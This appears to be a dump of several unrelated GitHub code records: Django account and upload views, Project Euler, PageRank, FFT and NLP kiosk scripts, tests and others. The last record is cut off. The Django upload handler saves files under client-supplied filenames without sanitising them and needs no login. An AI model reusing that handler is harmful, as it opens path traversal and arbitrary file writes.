UserRegistrationForm(request.POST)\n if user_form.is_valid():\n # Create a new user object but avoid saving it yet\n new_user = user_form.save(commit=False)\n # Set the chosen password\n new_user.set_password(user_form.cleaned_data['password'])\n # Save the User object\n new_user.save()\n return render(request, 'accounts/login.html', {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n return render(request, 'accounts/register.html', {'user_form': user_form})\n\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form = PasswordChangeForm(data=request.POST, user=request.user)\n\n if form.is_valid():\n form.save()\n update_session_auth_hash(request, form.user)\n return redirect(reverse('accounts:view_profile'))\n else:\n return redirect(reverse('accounts:change_password'))\n 
else:\n form = PasswordChangeForm(user=request.user)\n\n args = {'form': form}\n return render(request, 'accounts/change_password.html', args)\n''' \n File Upload Block\n views for uploading keywords via txt file\n'''\n\ndef upload(request):\n try:\n if request.method == 'POST':\n data = handle_uploaded_file(request.FILES['file'], str(request.FILES['file'])).splitlines()\n items_list = []\n for i in data:\n items_list.extend(i.strip().split(', '))\n\n domain_id = Domain.objects.get(name = request.POST.get(\"domain\")).id\n\n for i in items_list:\n if Items.objects.filter(name = i).exists():\n continue;\n else:\n item = Items(name = i, domain = Domain.objects.get(pk=domain_id),\n author = request.user, source = 'uploaded')\n item.save()\n if request.POST.get(\"hierarchy\"):\n set_relation(data,\"1\")\n return redirect('/items/')\n except:\n HttpResponse(\"Что-то не так\")\n return redirect('/items/')\n\n\"\"\"\nФункция обработчик загружаемого файла\n\"\"\"\nimport os\ndef handle_uploaded_file(file, filename):\n if not os.path.exists('upload/'):\n os.mkdir('upload/')\n with open('upload/' + filename, 'wb+') as destination:\n for chunk in file.chunks():\n destination.write(chunk)\n with open('upload/' + filename, encoding = 'utf-8') as f:\n data=f.read()\n return data\n\ndef set_relation(file, type_relation):\n course = file[0]\n file.remove(file[0])\n section = file[::2]\n print(type_relation)\n new_items = [ Items.objects.get(name = t) for t in section ]\n #check whether relation already exist\n\n item_id = Items.objects.get(name = course).id\n rel = Relation(item1 = Items.objects.get(pk=item_id) , relation = type_relation)\n rel.save()\n rel.item2.set(new_items)\n items_same_parent = rel.item2.all()\n same_parent_relation_2(items_same_parent)\n\n data = dict(zip(file[::2],file[1::2]))\n \n for key,value in data.items():\n \n items_list = value.split(', ')\n items_query = [ Items.objects.get(name = i) for i in items_list]\n #check whether relation already exist\n\n item_id = Items.objects.get(name = key).id\n relation = Relation(item1 = Items.objects.get(pk=item_id) , relation = type_relation)\n relation.save()\n relation.item2.set(items_query)\n items_same_parent = relation.item2.all()\n same_parent_relation_2(items_same_parent)\n same_parent_relation_2(items_query)\n\n \n\"\"\"\nФункция, которая создает связь является частью одного раздела\nпока не учитывает выбор на форме\nплюс надо добавить обработчик других связей\n\"\"\"\n\ndef same_parent_relation_2(items_same_parent):\n try:\n for item in items_same_parent:\n q = items_same_parent.exclude(name = item)\n item_id = Items.objects.get(name = item).id\n relation = Relation(item1 = Items.objects.get(pk = item_id), relation = '6')\n relation.save()\n relation.item2.set(q) \n except:\n pass\n\n","repo_name":"anyaarz/analytics","sub_path":"dataprocessing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1633076820","text":"import sys\nif sys.version_info.major == 2:\n\trange = xrange\n\n\ndef solution():\n\tresult = sum(1\n\t\tfor i in range(1, 10000000)\n\t\tif get_chain(i) == 89)\n\treturn str(result)\n\n\nchain = (1, 89)\n\ndef get_chain(n):\n\twhile n not in chain:\n\t\tn = square_digit_chain(n)\n\treturn n\n\n\ndef square_digit_chain(n):\n\tresult = 0\n\twhile n > 0:\n\t\tresult += total[n % 1000]\n\t\tn //= 1000\n\treturn result\n\ntotal = [sum(int(c)**2 for c in str(i)) for i in range(1000)]\n\n\nif 
__name__ == \"__main__\":\n\tprint(solution())\n","repo_name":"AmberJBlue/Project-Euler-Solutions","sub_path":"python/51-100/92.py","file_name":"92.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72021408884","text":"import numpy as np \nimport pandas as pd \n\nimport os\nprint(os.listdir(\"../input\"))\ndf_train = pd.read_csv(\"../input/train_V2.csv\")\ndf_test = pd.read_csv(\"../input/test_V2.csv\")\nprint(df_train.head())\nprint(df_test.head())\ndf_train.info()\ndf_test.info()\nprint(\"No. of rows in train set: \", len(df_train))\nprint(\"No. of rows in test set: \", len(df_test))\ndf_train = df_train.dropna(axis=0)\ndf_test = df_test.dropna(axis=0)\nprint(\"No. of rows in train set: \", len(df_train))\nprint(\"No. of rows in test set: \", len(df_test))\n# features = df_train.columns.drop([\"winPlacePerc\", \"Id\", \"groupId\", \"matchId\"])\nfeatures = ['walkDistance', 'killPlace', 'boosts', 'weaponsAcquired']\ntrain_X = df_train[features]\ntrain_y = df_train['winPlacePerc']\ntest_X = df_test[features]\n\n#one hot encode\ntrain_X = pd.get_dummies(train_X)\ntest_X = pd.get_dummies(test_X)\nfrom sklearn.ensemble import RandomForestRegressor\n\nforest_model = RandomForestRegressor(random_state=42)\nforest_model.fit(train_X, train_y)\npredict_y = forest_model.predict(test_X)\npredict_y\noutput = pd.DataFrame({'Id': df_test.Id,\n 'winPlacePerc': predict_y})\n\noutput.to_csv('submission.csv', index=False)\noutput","repo_name":"aorursy/new-nb-7.2","sub_path":"tanyeejet_pubg-finish-placement-prediction-rf.py","file_name":"tanyeejet_pubg-finish-placement-prediction-rf.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5603726574","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport mathlib.random as rnd\nimport mathlib.misc as misc\n\n# Constants. \ngrid_size = 1024\nmin_distance = 1 # size of a single cell in Mpc.\n\n# Create the random number generator.\nrandom = rnd.Random(78379522)\n\n# The orders of the power spectrum.\npowers = [-1,-2,-3]\n\ndef main():\n\n # Generate the random uniform numbers that \n # are later transformed to normal distributed variablaes.\n # The numbers are generated once to reduce computational time.\n random_numbers = random.gen_uniforms(grid_size*grid_size*2)\n\n # Create the plots for n = -1, n = -2, n = -3 \n for power in powers:\n\n # Generate the field matrix.\n matrix = misc.generate_matrix_2D(grid_size, min_distance, \n gen_complex, random_numbers, power)\n\n #Give it the correct symmetry. \n field = misc.make_hermitian2D(matrix)\n \n # Plot it\n\n # The field is real, but it is still treated as a complex\n # value this, we have to take the r eal part. 
It is also multiplied\n # by grid_size^2 to correct for the normalization constant \n # in np.fft.ifft2.\n \n plt.imshow(np.fft.ifft2(field).real * grid_size*grid_size)\n plt.xlabel('Distance [Mpc]')\n plt.ylabel('Distance [Mpc]')\n plt.title('n = {0}'.format(power))\n plt.colorbar()\n plt.savefig('./Plots/2_field_{0}.pdf'.format(power))\n plt.figure()\n\ndef gen_complex(k, n, rand1, rand2):\n \"\"\"\n Generate a complex number using the power\n spectrum.\n In:\n param:k -- The magnitude of the wavenumber.\n param:n -- The order of the power law.\n param: rand1 -- A random uniform variable between 0 and 1.\n param: rand2 -- A random uniform variables between 0 and 1.\n\n \"\"\"\n\n sigma = 0\n\n if n == -2:\n sigma = 1/k\n else:\n sigma = np.sqrt(k**n)\n \n # Determine the complex value\n a,b = random.gen_normal_uniform(0,sigma,rand1,rand2)\n return complex(a,b)\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"1633376/NUR-Assigment-2","sub_path":"Code/assigment_2.py","file_name":"assigment_2.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27937548338","text":"\nszam= 6\nprint (szam)\n\n\nszam1 = 10\nszam2 = 5\nkulonbseg = szam1 - szam2\nprint (kulonbseg)\n\ntort1 = 3.5\ntort2 = 5.5\nszorzat = tort1 * tort2\nprint(szorzat)\n\nszam3 = 5\nszam4 = 6\nnagyobb = max(szam3, szam4)\nprint (nagyobb)\n\nszam5 = 5\nszam6 = 10\nif szam != 0:\n tort_alak = szam5 / szam6\n print(f\"{szam5} / {szam6} = {tort_alak}\")\n\nszam7 = int(input(\"10:\"))\nszam8 = int(input(\"20:\"))\nfor i in range(szam7, szam8):\n print(i, end=' ')\nprint()\n\nszam9 = 10\nszam10 = 20\nfor i in range(szam9, szam10 + 1):\n print(i, end=' ')\n \n\n\n","repo_name":"Bence681/python2023","sub_path":"órai feladatok.py","file_name":"órai feladatok.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12770623563","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 24 14:03:19 2014\n\n@author: huajh\n\"\"\"\n\n\nimport numpy as np\n#from matplotlib import pyplot as plt\nimport sys,os \nimport cv2\n\nfile = sys.argv[1]\n#file2 = sys.argv[2]\n\ndef rotate_image(image, angle):\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)\n result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n return result\n\n\nif __name__ == '__main__': \n \n #fname = 'moonlanding.png'\n fname ='lenaNoise.jpg'\n # your code here, you should get this image shape when done:\n # Image shape: (474, 630)\n #im = plt.imread(fname).astype(float)\n im = cv2.imread(file)\n #im2 = cv2.imread(file2)\t\n #print \"Image shape: %s\" % str(im.shape)\n \n \n # Assign the 2d FFT to `F`\n #...\n F = np.fft.fft2(im)\n F2 = np.fft.fft2(rotate_image(im,0.1))\n\t\n # n = F.size\n # timestep = 0.1\n # freq = np.fft.fftfreq(n, d=timestep)\n # Define the fraction of coefficients (in each direction) we keep\n keep_fraction = 0.5\n \n # Call ff a copy of the original transform. 
Numpy arrays have a copy\n # method for this purpose.\n # ...\n ff = F.copy()\n #ff = np.fft.fftshift(ff)\n #n = ff.size\n #ff2 = np.fft.fftfreq(n, d=0.5)\n ff2 = F2.copy()\n # Set r and c to be the number of rows and columns of the array.\n # ....\n try:\n r,c,a = ff.shape\n except:\n r,c = ff.shape\n\n # Set to zero all rows with indices between r*keep_fraction and\n # r*(1-keep_fraction):\n #... \n #pos_mask = np.where(ff > 0)\n #ff[pos_mask:pos_mask] = 0\n #ff[:,pos_mask:pos_mask] = 0\t\n #n = ff.size\n #timestep = 0.1\n #freq = np.fft.fftfreq(n, d=timestep)\n\t\n\t\n max_x = np.amax(ff, axis=1) \n max = np.amax(ff) \n min = np.amin(ff)\n mean_v = np.mean(ff)\n median = np.median(ff)\n #ff[:] = np.where((ff >= max) & (ff != max) , ff[:].real,ff[:].real)\t\n #ff[:] = np.where((ff < max) & (ff > mean_v), ff[:],0)\t\t\n\t# odd , 1::2\n\t\n # work !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\t\n #ff[::2,1::2] = 1\n #ff[::2,::2] = 1\n\n ff[::2,1::2] = ff2[::2,1::2]\n ff[::2,::2] = ff2[::2,::2]\n\t\n #ff[::2,::2] = 1\n #ff[1::2,1::2] = 1\n #ff[1::2,1::2] = 0\t\n #ff[::2,1::2] = ff[1::2,::2].imag\t\n #ff[:] = np.where((ff ) , ff[:].real,ff[:].real)\n #even\n #ff[:,1::2] = 1 \n #odd\n #ff[::2,::2] = 0\n #ff[1::2,::2] = -1\n #ff[::2,1::2] = -1\t\n #ff[1::2,1::2] = ff[1::2,1::2].imag\t\n #ff[::2,1::2] = ff[1::2,::2].imag\t\n #ff[::2,1::2] = ff[::2,1::2].real\n #ff[:] = ff[:].real\n #ff[:] = np.where((ff <= mean_v) , ff[:].imag,ff[:].imag)\t\n #ff[0:] = np.where((ff[0:] >= max_x) , ff[0:],ff[0:])\n\t\n\t\n #ff[:] = np.where(ff == max, mean_v,ff[:])\t\n #ff[int(np.where(a==np.max(a))):int(np.where(a==np.max(a)))] = 0\n #ff[:,int(c*keep_fraction):int(c*(1-keep_fraction))] = 0\n\t\n #ff[int(r*keep_fraction):int(r*(1-keep_fraction))] = 0\n #ff[:,int(c*keep_fraction):int(c*(1-keep_fraction))] = 0\n\t\n #sample_freq = fftpack.fftfreq(sig.size, d=time_step)\n #pos_mask = np.where(sample_freq > 0)\n #freqs = sample_freq[pos_mask]\n #peak_freq = freqs[power[pos_mask].argmax()]\n #ff[np.abs(sample_freq) > peak_freq] = 0\n #ff = np.delete(ff, np.argmax(ff))\n #max_x = np.amax(ff, axis=0) \n #mean_v = np.mean(ff)\n #print (mean_v )\n #im_new = np.fft.ifft2(ff).imag\n im_new = np.fft.ifft2(ff).real\t\n im_new2 = np.fft.ifft2(ff2).real\t\n\t\n im_new = cv2.convertScaleAbs(im_new)\t\t\n # hsv = cv2.cvtColor(im_new, cv2.COLOR_BGR2HSV)\n # value = 5 #whatever value you want to add\n # hsv[:,:,2] += value\n # im_new = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\t\n #im_new = cv2.convertScaleAbs(im_new)\t\n #im_new = cv2.convertScaleAbs(im_new)\n #im_new = cv2.addWeighted(im_new, 0.1, im, 0.9, 3)\n #im_new = cv2.subtract(im_new,im)\n #im_new = (255-im_new)\n\n cv2.imwrite(file+\"newm1.jpg\", im_new)\n cv2.imwrite(file+\"rot2.jpg\", im_new2)\t\n","repo_name":"Wiffzack/Examples","sub_path":"fft/fft_wiggle.py","file_name":"fft_wiggle.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31715325156","text":"import os\nimport random\nimport re\nimport sys\nimport math\n\nDAMPING = 0.85\nSAMPLES = 10000\n\n\ndef main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python pagerank.py corpus\")\n corpus = crawl(sys.argv[1])\n ranks = sample_pagerank(corpus, DAMPING, SAMPLES)\n print(f\"PageRank Results from Sampling (n = {SAMPLES})\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n ranks = iterate_pagerank(corpus, DAMPING)\n print(f\"PageRank Results from Iteration\")\n for page in sorted(ranks):\n 
print(f\" {page}: {ranks[page]:.4f}\")\n\n\ndef crawl(directory):\n \"\"\"\n Parse a directory of HTML pages and check for links to other pages.\n Return a dictionary where each key is a page, and values are\n a list of all other pages in the corpus that are linked to by the page.\n \"\"\"\n pages = dict()\n\n # Extract all links from HTML files\n for filename in os.listdir(directory):\n if not filename.endswith(\".html\"):\n continue\n with open(os.path.join(directory, filename)) as f:\n contents = f.read()\n links = re.findall(r\"]*?)href=\\\"([^\\\"]*)\\\"\", contents)\n pages[filename] = set(links) - {filename}\n\n # Only include links to other pages in the corpus\n for filename in pages:\n pages[filename] = set(\n link for link in pages[filename]\n if link in pages\n )\n\n return pages\n\n\ndef transition_model(corpus, page, damping_factor):\n \"\"\"\n Return a probability distribution over which page to visit next,\n given a current page.\n\n With probability `damping_factor`, choose a link at random\n linked to by `page`. With probability `1 - damping_factor`, choose\n a link at random chosen from all pages in the corpus.\n \"\"\"\n transition_model = dict()\n\n # pages linked in current page\n nexts = corpus.get(page)\n\n # if there is no link in the current page, equal probability between all pages of the corpus\n if len(nexts) == 0:\n for key in corpus.keys():\n transition_model[key] = 1/len(corpus)\n else:\n # initialized with the equal probability on landing on a random page\n for next_page in nexts:\n transition_model[next_page] = damping_factor/len(nexts)\n\n # probability of choosing a page linked on the current one\n for page in corpus.keys():\n if page not in transition_model:\n transition_model[page] = 0\n transition_model[page] += (1 - damping_factor)/len(corpus.keys())\n\n # normalize results\n sum_trans = sum(transition_model.values())\n\n for key in transition_model.keys():\n transition_model[key] = round((transition_model[key]/sum_trans), 4)\n\n return transition_model\n\n\ndef sample_pagerank(corpus, damping_factor, n):\n \"\"\"\n Return PageRank values for each page by sampling `n` pages\n according to transition model, starting with a page at random.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n # generate a random index for first page\n index = random.randint(0, len(corpus) - 1)\n page = list(corpus.keys())[index]\n\n page_ranks = dict()\n\n # initialize all ranks\n for key in corpus.keys():\n page_ranks[key] = 0\n\n # first page was chosen\n page_ranks[page] += 1/n\n\n # n iterations, but first page already chosen\n for i in range(n - 1):\n # get transition model\n trans_model = transition_model(corpus, page, damping_factor)\n\n page = getRandomPage(trans_model)\n # page was chosen\n page_ranks[page] += 1/n\n\n return page_ranks\n\n\ndef iterate_pagerank(corpus, damping_factor):\n \"\"\"\n Return PageRank values for each page by iteratively updating\n PageRank values until convergence.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). 
All\n PageRank values should sum to 1.\n \"\"\"\n pagerank_dict = dict()\n # initialize first ranks, equal probability\n for key in corpus.keys():\n pagerank_dict[key] = round(1 / len(corpus), 4)\n\n max_value = 1\n while max_value > 0.001:\n max_value = 0\n for key in corpus.keys():\n new_value = 0\n\n # get pages pointing toward current page\n links_towards = get_pages_pointing_towards(corpus, key)\n\n for page in links_towards:\n if page != key:\n new_value += pagerank_dict[page] / len(corpus[page])\n\n # new rank of the page\n new_value = ((1 - damping_factor)/len(corpus)) + damping_factor * new_value\n\n # get max value of the change\n if max_value < pagerank_dict[key] - new_value:\n max_value = new_value\n\n pagerank_dict[key] = new_value\n\n # normalize results\n total_value = sum(pagerank_dict.values())\n # round results\n for key in pagerank_dict.keys():\n pagerank_dict[key] = round(pagerank_dict[key]/total_value, 4)\n\n return pagerank_dict\n\n\ndef get_pages_pointing_towards(corpus, page):\n \"\"\"\n Return the pages pointing towards page\n \"\"\"\n result = list()\n for key in corpus.keys():\n if page in corpus[key]:\n result.append(key)\n return result\n\n\ndef getRandomPage(transition_model):\n \"\"\"\n Return a random page knowing a transition model\n \"\"\"\n rand = random.randint(0, math.floor(sum(transition_model.values())*100))\n cell = 0\n for page in transition_model.items():\n cell += page[1]*100\n if rand <= cell:\n return page[0]\n\n print(rand)\n print(round(sum(transition_model.values())*100))\n print(cell)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ncaparros/CS50AI","sub_path":"week2/pagerank/pagerank.py","file_name":"pagerank.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71955932725","text":"import joblib\nfrom konlpy.tag import Okt\nfrom .ordermenu import orderParsing\n\nokt = Okt()\ntokenizer = joblib.load(\"./token.pkl\")\nrnd_clf = joblib.load(\"./nlp_sample.pkl\")\npad_sequences = joblib.load(\"./pad_sequences.pkl\")\n\n\n# 띄어쓰기 함수\ndef spacing_okt(wrongSentence):\n tagged = okt.pos(wrongSentence)\n corrected = \"\"\n for i in tagged:\n # print(i)\n if i[1] in ('Josa', 'PreEomi', 'Eomi', 'Suffix', 'Punctuation', 'Modifier'):\n corrected += i[0]\n else:\n corrected += \" \"+i[0]\n if corrected[0] == \" \":\n corrected = corrected[1:]\n return corrected\n\n\n# 처음 보는 문장 검사\ndef check_new_text(text):\n for x in text:\n if int(x) > 1:\n return True\n return False\n\n\ndef rndModel(new_sentence):\n stopwords = ['메뉴', '보이다', '줄다', '이요', '요', '의', '로', '가', '이', '은', '들', '는', '좀',\n '잘', '걍', '과', '도', '를', '으로', '자', '에', '와', '한', '하다', '저기요', '주세요', '할게요', '하세요', '주다']\n # global order_data\n text = new_sentence\n new_sentence = spacing_okt(new_sentence)\n print(new_sentence)\n new_sentence = new_sentence.replace(\"[^ㄱ-ㅎㅏ-ㅣ가-힣 ]\", \"\")\n # 토큰화\n new_sentence = okt.morphs(new_sentence, stem=True)\n\n # 불용어 제거\n new_sentence = [word for word in new_sentence if not word in stopwords]\n\n # 정수 인코딩\n encoded = tokenizer.texts_to_sequences([new_sentence])\n print(new_sentence)\n # print(encoded)\n\n if check_new_text(encoded[0]) == False:\n print(\"이해할수 없는 단어\")\n\n else:\n deleteList = []\n for x in range(len(encoded[0])):\n if encoded[0][x] == 1:\n deleteList.append(x)\n deleteList.sort(reverse=True)\n\n if len(deleteList):\n for x in deleteList:\n encoded[0].pop(x)\n # 패딩\n pad_new = pad_sequences(encoded, maxlen=4)\n # print(pad_new)\n\n 
# 예측\n # score = float(rnd_clf.predict(pad_new))\n # print(score)\n result = rnd_clf.predict(pad_new)\n print(result[0])\n result_set = {'result': int(result[0])}\n name = \"\"\n if result[0] == 9:\n result_set = orderParsing(text)\n elif result[0] == 3:\n if text.find(\"매장\") != -1:\n name = \"매장\"\n if text.find(\"포장\") != -1:\n name = \"포장\"\n result_set = {'result': int(result[0]), '0': {'name': name}}\n print(result_set)\n return result_set\n\n\nif __name__ == \"__main__\":\n while(1):\n temp = input()\n if(temp == 'stopModel'):\n joblib.dump(tokenizer, 'token.pkl')\n joblib.dump(rnd_clf, 'nlp_sample.pkl')\n joblib.dump(rndModel, 'rndModel')\n break\n else:\n rndModel(temp)\n","repo_name":"chunwookJoo/kiosk_project","sub_path":"kiosk/modules/nlp/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5692956488","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\nfrom timeit import default_timer as timer\r\nimport random\r\n\r\n#setting a variable for restarting the test\r\nx=0\r\n\r\n#creating the main screen for starting the game\r\nroot = Tk()\r\nroot.title(\"A Writing Test\")\r\nroot.geometry(\"500x200\")\r\n\r\n#function for beginning the test\r\n\r\ndef begin():\r\n\r\n#using the variable to make it possible to destroy the original screen and root2 screens(the second screen created when the start button is clickeed)\r\n global x\r\n if x==0:\r\n root.destroy()\r\n x=x+1\r\n\r\n#checking the results using .get to get what the user entered and to check it across the word selected randomly and ending the timer\r\n def results():\r\n if entry.get()==words[word]:\r\n end=timer()\r\n \r\n print(\"You finished in \" + str(end-start) + \" seconds!\")\r\n else:\r\n print(\"Wrong Answer Try again, check your spelling\")\r\n\r\n#creating a list of sentences and randomly selecting from it\r\n words = [\"typing starts here for always\", \"terrible is the man who falls\", \"dunking is for the best of the players\", \"tugging is used in tug of war\", \"hippo's seem to love the water\",\r\n \"You bite up because of your lower jaw\", \"He created a pig burger out of beef\", \"She advised him to come back at once\", \"Nobody loves a pig wearing lipstick\"]\r\n word=random.randint(0,(len(words)-1))\r\n\r\n#starting the timer\r\n start=timer()\r\n\r\n#creating a new screen to replace the main when start button is clicked and root.destroy is called on\r\n root2 = Tk()\r\n root2.title(\"A Writing Test\")\r\n root2.geometry(\"500x200\")\r\n\r\n#adding a background image\r\n my_img = ImageTk.PhotoImage(Image.open(\"bimg.jpg\"))\r\n my_Label = Label(image=my_img)\r\n my_Label.pack()\r\n\r\n#adding a label that shows the word randomly selected\r\n wordLabel = Label(root2, text=words[word], bg=\"yellow\")\r\n wordLabel.place(x=275, y=45)\r\n\r\n#creating an instruction label\r\n label1 = Label(root2, text=\"How fast can you type this word?\")\r\n label1.place(x=50, y = 40)\r\n\r\n#creating an entry for the user to type in\r\n entry=Entry(root2)\r\n entry.place(x=225, y=80)\r\n\r\n#creating 2 buttons with commands attached to the functions above\r\n chButton = Button(root2, text=\"Submit\", command=results)\r\n chButton.place(x=225, y=120)\r\n\r\n reButton = Button(root2, text=\"Restart?\", command=begin)\r\n reButton.place(x=150, y=120)\r\n\r\n root.mainloop()\r\n\r\n#adding an image to use as a background using ImageTk from Pillow which used PIL\r\nmy_img = 
ImageTk.PhotoImage(Image.open(\"bimg.jpg\"))\r\nmy_Label = Label(image=my_img)\r\nmy_Label.pack()\r\n\r\n#adding a starting label requesting the user to click a button to begin\r\nstLabel = Label(root, text=\"Click Start to Begin the Test\", bg=\"yellow\", width=20, height=3)\r\nstLabel.place(x=170, y=25)\r\n\r\n#adding a starting button\r\nstButton = Button(root, text=\"Start\", command=begin, width=14, bg='grey')\r\nstButton.place(x=185, y=85)\r\n\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"sambeckfeld/SpeedTypingTest","sub_path":"SpeedTyping.py","file_name":"SpeedTyping.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9452815215","text":"res = []\n# nums = [3,2,4]\n# target = 6\nnums = [2,7,11,15]\ntarget = 9\n\nfor i in range(len(nums)-1) :\n j = i + 1\n for j in range(j,len(nums)) :\n if nums[i] + nums[j] == target :\n res.extend([i, j])\nprint(res)","repo_name":"vxela/altera-batch5-","sub_path":"Weekend/LetCode Problems/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73946403765","text":"# --coding:utf-8--\n\n\n# @Author: 逸风\n# @Time: 2019-12-22 17:56\n\n\nclass Zone:\n def __init__(self):\n self.id = -1\n self.center = \"\"\n self.centre_point = -1\n self.name = \"\"\n\n @staticmethod\n def parse(zones_json_object):\n zones = Zone()\n zones.__dict__ = zones_json_object\n return zones\n\n\n","repo_name":"asfathermou/s3","sub_path":"entities/zone.py","file_name":"zone.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11153234231","text":"import unittest\nimport numpy as np\nimport numpy.testing as npt\n\nfrom ols_example import linalg\n\n################################################################################\n\nclass LinalgTestCase(unittest.TestCase):\n \"\"\"Class for linear algebra tests.\"\"\"\n\n ############################################################################\n\n def test_check_elements(self):\n \"\"\"check_elements\"\"\"\n\n empty_array = np.empty(10)\n full_array = np.ones(10)\n\n assert linalg.check_elements(empty_array), \"Test input empty array.\"\n assert linalg.check_elements(full_array), \"Test input full array.\"\n\n ############################################################################\n\n def test_check_2d(self):\n \"\"\"check_2d\"\"\"\n\n with self.assertRaises(Exception) as context:\n linalg.check_2d(1.0)\n self.assertTrue('Input must be an ndarray.' 
in str(context.exception))\n\n one_d = np.ones((10,))\n output = linalg.check_2d(one_d)\n\n one_d = np.ones((10,1))\n output = linalg.check_2d(one_d)\n\n one_d = np.ones((10,1,1))\n output = linalg.check_2d(one_d)\n\n two_d = np.ones((10,10))\n output = linalg.check_2d(two_d)\n\n two_d = np.ones((10,10,1))\n output = linalg.check_2d(two_d)\n\n ############################################################################\n\n def test_identity_matrix(self):\n \"\"\"identity_matrix\"\"\"\n\n true_identity = np.asarray([[1,0,0],[0,1,0],[0,0,1]])\n\n identity = linalg.identity_matrix(3)\n\n npt.assert_equal(true_identity, identity)\n\n ############################################################################\n\n def test_copy_matrix(self):\n \"\"\"copy_matrix\"\"\"\n\n input_arr = np.random.normal(0, 3, (10, 4))\n\n copy_arr = linalg.copy_matrix(input_arr)\n\n npt.assert_equal(input_arr, copy_arr)\n\n ############################################################################\n\n def test_is_invertible(self):\n \"\"\"is_invertible\"\"\"\n\n A = np.random.normal(0, 10, (10, 10))\n\n assert linalg.is_invertible(A), \"Flagged inveretible matrix as non-invertible.\"\n\n ############################################################################\n\n def test_transpose(self):\n \"\"\"transpose\"\"\"\n\n input_arr = np.random.normal(0, 3, (10, 4))\n\n true_transposed = input_arr.T\n\n transposed = linalg.transpose(input_arr)\n\n npt.assert_equal(true_transposed, transposed)\n\n ############################################################################\n\n def test_matmul(self):\n \"\"\"matmul\"\"\"\n\n A = np.random.normal(0, 3, (10, 2))\n B = np.random.normal(0, 3, (2, 10))\n\n True_C = A.dot(B)\n\n C = linalg.matmul(A, B)\n\n npt.assert_almost_equal(True_C, C)\n\n ############################################################################\n\n def test_invert_matrix(self):\n \"\"\"invert_matrix\"\"\"\n\n A = np.random.normal(0, 10, (10, 10))\n true_invert = np.linalg.inv(A)\n\n invert = linalg.invert_matrix(A)\n\n npt.assert_almost_equal(true_invert, invert)\n\nif __name__ == '__main__':\n unittest.main(failfast=True)\n","repo_name":"james-montgomery-blog/code_crash_course","sub_path":"Python/OLS/tests/test_linalg.py","file_name":"test_linalg.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4576466608","text":"import numpy as np\nfrom time import time\nfrom scipy.stats import spearmanr,kendalltau,rankdata\nimport math\nfrom sklearn.metrics import roc_auc_score\n\n## best cluster metrics :XB\ndef _xb(s, y):\n num_anomaly = np.sum(y==1)\n s_rank = np.sort(s)\n threshold = s_rank[-num_anomaly]\n c_normal, c_anomaly = np.mean(s_rank[:-num_anomaly]),np.mean(s_rank[-num_anomaly:])\n c = [c_anomaly if i >= threshold else c_normal for i in s]\n return sum((s-c)**2) / (len(s) * ((c_normal - c_anomaly) ** 2))\n\ndef XB(OD_scores,y):\n HPconfs = len(OD_scores)\n metrics = []\n for i in range(HPconfs):\n metrics.append( _xb(OD_scores[i],y))\n selected_index = np.argmax(metrics)\n\n return selected_index\n\ndef MC(OD_scores,_):\n HPconfs = len(OD_scores)\n rank_scores = [rankdata(score) for score in OD_scores]\n\n P = HPconfs - 1\n MC_scores = []\n for i in range(HPconfs):\n corr_sum = 0\n weight = np.ones((HPconfs,))\n weight[i] = 0\n weight = weight/np.sum(weight)\n random_HPconfss = np.random.choice(np.arange(HPconfs),size=P,replace=False,p=weight).tolist()\n\n for j in random_HPconfss:\n i_s,j_s = 
